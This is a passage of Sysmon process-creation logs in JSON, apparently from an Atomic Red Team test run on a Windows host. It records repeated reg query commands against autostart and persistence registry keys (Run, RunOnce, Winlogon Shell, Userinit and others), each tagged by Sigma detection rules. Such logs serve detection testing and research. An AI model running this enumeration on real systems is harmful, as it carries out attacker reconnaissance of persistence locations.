(WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-001009453100","ParentProcessId":5016,"ProcessGuid":"747F3D96-D87C-5D31-0000-00105B473100","ProcessId":6208,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.327"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3686,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.335446Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87C-5D31-0000-001097493100","ProcessId":1680,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.377"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3687,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.389557Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-001097493100","ParentProcessId":1680,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010E94B3100","ProcessId":3680,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.409"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3688,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.413390Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010264E3100","ProcessId":1428,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.447"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3689,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.463556Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-0010264E3100","ParentProcessId":1428,"ProcessGuid":"747F3D96-D87C-5D31-0000-001078503100","ProcessId":3220,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.493"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3690,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.497481Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-0010B4523100","ParentProcessId":4016,"ProcessGuid":"747F3D96-D87C-5D31-0000-001006553100","ProcessId":5024,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.575"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3692,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.585243Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-00103F573100","ParentProcessId":2440,"ProcessGuid":"747F3D96-D87C-5D31-0000-001080593100","ProcessId":4360,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.669"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3694,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.678107Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-0010CA5B3100","ParentProcessId":956,"ProcessGuid":"747F3D96-D87C-5D31-0000-00101D5E3100","ProcessId":3608,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.739"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3696,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.743506Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-001056603100","ParentProcessId":6832,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010A8623100","ProcessId":6436,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.803"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3698,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.807707Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-0010E1643100","ParentProcessId":5936,"ProcessGuid":"747F3D96-D87C-5D31-0000-001033673100","ProcessId":7144,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.865"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3700,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.868916Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87C-5D31-0000-00107C693100","ProcessId":1740,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.900"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3701,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.921206Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-00107C693100","ParentProcessId":1740,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010C86B3100","ProcessId":644,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.931"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3702,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.937862Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010056E3100","ProcessId":4220,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.956"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3703,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.975133Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-0010056E3100","ParentProcessId":4220,"ProcessGuid":"747F3D96-D87C-5D31-0000-001057703100","ProcessId":6620,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.986"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3704,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.990533Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87D-5D31-0000-001090723100","ProcessId":196,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.019"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3705,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.036329Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query 